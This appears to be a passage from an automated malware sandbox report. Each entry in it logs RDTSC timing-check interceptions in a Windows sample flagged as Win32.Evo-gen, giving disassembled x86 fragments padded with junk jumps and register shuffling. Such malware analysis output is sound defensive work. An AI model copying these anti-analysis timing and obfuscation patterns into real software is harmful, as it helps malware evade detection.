                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 518030D second address: 5180356 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FC734882086h 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 push esi 0x00000013 mov bl, 10h 0x00000015 pop eax 0x00000016 mov bx, ABAAh 0x0000001a popad 0x0000001b je 00007FC7A662034Ch 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 call 00007FC73488207Ah 0x00000029 pop eax 0x0000002a mov esi, ebx 0x0000002c popad 0x0000002d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180356 second address: 51803FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 pushad 0x00000011 mov cx, 042Dh 0x00000015 pushfd 0x00000016 jmp 00007FC734E5F77Ah 0x0000001b sbb eax, 16B83CC8h 0x00000021 jmp 00007FC734E5F77Bh 0x00000026 popfd 0x00000027 popad 0x00000028 je 00007FC7A6BFDA18h 0x0000002e jmp 00007FC734E5F786h 0x00000033 mov edx, dword ptr [esi+44h] 0x00000036 jmp 00007FC734E5F780h 0x0000003b or edx, dword ptr [ebp+0Ch] 0x0000003e jmp 00007FC734E5F780h 0x00000043 test edx, 61000000h 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c pushfd 0x0000004d jmp 00007FC734E5F77Dh 0x00000052 and ah, FFFFFFF6h 0x00000055 jmp 00007FC734E5F781h 0x0000005a popfd 0x0000005b pushad 0x0000005c popad 0x0000005d popad 0x0000005e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51803FA second address: 5180446 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FC7A66202E9h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC734882084h 0x00000016 sub ecx, 665FF178h 0x0000001c jmp 00007FC73488207Bh 0x00000021 popfd 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180446 second address: 5180493 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F784h 0x00000009 popad 0x0000000a popad 0x0000000b test byte ptr [esi+48h], 00000001h 0x0000000f jmp 00007FC734E5F780h 0x00000014 jne 00007FC7A6BFD9A3h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC734E5F787h 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180493 second address: 51804AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882084h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51804AB second address: 51804AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51706FD second address: 5170711 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882080h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170711 second address: 517072F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC734E5F783h 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517072F second address: 5170736 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170736 second address: 51707A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007FC734E5F787h 0x0000000f mov ebp, esp 0x00000011 jmp 00007FC734E5F786h 0x00000016 and esp, FFFFFFF8h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edx, cx 0x0000001f pushfd 0x00000020 jmp 00007FC734E5F786h 0x00000025 sub ax, AC88h 0x0000002a jmp 00007FC734E5F77Bh 0x0000002f popfd 0x00000030 popad 0x00000031 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707A1 second address: 51707C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707C5 second address: 51707CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707CB second address: 51707D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707D1 second address: 51707D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51707D5 second address: 517080F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FC734882084h 0x00000012 jmp 00007FC734882085h 0x00000017 popfd 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517080F second address: 517081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Ah 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517081D second address: 517084C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007FC734882086h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517084C second address: 5170850 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170850 second address: 517086D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517086D second address: 517089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC734E5F781h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517089B second address: 517089F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 517089F second address: 51708B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708B2 second address: 51708B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708B7 second address: 51708F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007FC734E5F787h 0x00000011 sub ebx, ebx 0x00000013 jmp 00007FC734E5F77Fh 0x00000018 test esi, esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cl, ABh 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708F3 second address: 51708F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708F9 second address: 51708FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51708FD second address: 5170911 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FC7A6627AFFh 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170911 second address: 5170917 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170917 second address: 5170952 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882082h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FC734882080h 0x00000015 mov ecx, esi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov bx, B2C0h 0x0000001e mov di, 3AECh 0x00000022 popad 0x00000023 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170952 second address: 51709DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 0D97h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007FC7A6C051BDh 0x00000010 pushad 0x00000011 call 00007FC734E5F77Fh 0x00000016 mov bx, si 0x00000019 pop eax 0x0000001a pushad 0x0000001b mov dx, E176h 0x0000001f push edi 0x00000020 pop eax 0x00000021 popad 0x00000022 popad 0x00000023 test byte ptr [76FA6968h], 00000002h 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FC734E5F77Fh 0x00000031 xor eax, 64ED01FEh 0x00000037 jmp 00007FC734E5F789h 0x0000003c popfd 0x0000003d mov esi, 03759647h 0x00000042 popad 0x00000043 jne 00007FC7A6C0516Fh 0x00000049 pushad 0x0000004a mov eax, 5179073Fh 0x0000004f movzx eax, bx 0x00000052 popad 0x00000053 mov edx, dword ptr [ebp+0Ch] 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007FC734E5F77Ah 0x0000005d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51709DC second address: 5170A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC734882085h 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170A03 second address: 5170A48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC734E5F781h 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 mov ax, 2383h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC734E5F786h 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170A48 second address: 5170A55 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170A55 second address: 5170A89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FC734E5F77Fh 0x0000000a sub si, E98Eh 0x0000000f jmp 00007FC734E5F789h 0x00000014 popfd 0x00000015 popad 0x00000016 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170A89 second address: 5170AAD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Ch 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170AAD second address: 5170AB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170AB3 second address: 5170AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170AB7 second address: 5170AEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FC734E5F77Ah 0x00000015 sub cx, F198h 0x0000001a jmp 00007FC734E5F77Bh 0x0000001f popfd 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170AEA second address: 5170B29 instructions: 0x00000000 rdtsc 0x00000002 mov bl, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, edx 0x00000008 popad 0x00000009 push dword ptr [ebp+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushfd 0x00000012 jmp 00007FC734882086h 0x00000017 jmp 00007FC734882085h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170B69 second address: 5170BB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b mov cl, 3Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f pushfd 0x00000010 jmp 00007FC734E5F77Fh 0x00000015 jmp 00007FC734E5F783h 0x0000001a popfd 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170BB0 second address: 5170BF5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC734882088h 0x00000008 adc eax, 21024F08h 0x0000000e jmp 00007FC73488207Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FC734882080h 0x00000021 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170BF5 second address: 5170BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170BFB second address: 5170C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC73488207Dh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5170C0C second address: 5170C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180A7B second address: 5180A80 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180A80 second address: 5180AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007FC734E5F77Eh 0x0000000d mov ebp, esp 0x0000000f jmp 00007FC734E5F780h 0x00000014 pop ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180AAF second address: 5180AB5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5180AB5 second address: 5180AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F77Bh 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5200725 second address: 5200729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5200729 second address: 520072D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 520072D second address: 5200733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F08FB second address: 51F092D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, si 0x00000006 mov eax, 5BC62463h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007FC734E5F789h 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov dh, 5Bh 0x0000001a mov di, cx 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F092D second address: 51F0953 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC73488207Dh 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0770 second address: 51F0786 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0786 second address: 51F07A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882087h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F07A1 second address: 51F07B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F784h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F07B9 second address: 51F07BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F07BD second address: 51F0854 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx esi, bx 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 mov edx, 7FC2EC24h 0x00000017 pushfd 0x00000018 jmp 00007FC734E5F77Dh 0x0000001d sbb cl, 00000066h 0x00000020 jmp 00007FC734E5F781h 0x00000025 popfd 0x00000026 popad 0x00000027 mov ebp, esp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FC734E5F783h 0x00000032 sbb si, E59Eh 0x00000037 jmp 00007FC734E5F789h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FC734E5F780h 0x00000043 sub esi, 390B9F98h 0x00000049 jmp 00007FC734E5F77Bh 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51F0854 second address: 51F0881 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882089h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Dh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190094 second address: 51900B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51900B1 second address: 5190129 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 8Dh 0x00000005 pushfd 0x00000006 jmp 00007FC734882088h 0x0000000b sub ax, D908h 0x00000010 jmp 00007FC73488207Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FC734882086h 0x0000001f push eax 0x00000020 pushad 0x00000021 mov bx, E614h 0x00000025 mov ax, bx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov edi, ecx 0x0000002f pushfd 0x00000030 jmp 00007FC73488207Ch 0x00000035 or si, CDC8h 0x0000003a jmp 00007FC73488207Bh 0x0000003f popfd 0x00000040 popad 0x00000041 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190129 second address: 519014B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 3Bh 0x00000005 push ecx 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FC734E5F77Fh 0x00000014 pop ecx 0x00000015 mov bh, 1Ch 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 519014B second address: 5190197 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC734882081h 0x00000009 sub cx, 7046h 0x0000000e jmp 00007FC734882081h 0x00000013 popfd 0x00000014 mov si, CAF7h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC734882084h 0x00000025 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 5190197 second address: 519019B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 519019B second address: 51901A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51901A1 second address: 51901A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exeRDTSC instruction interceptor: First address: 51901A7 second address: 51901AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
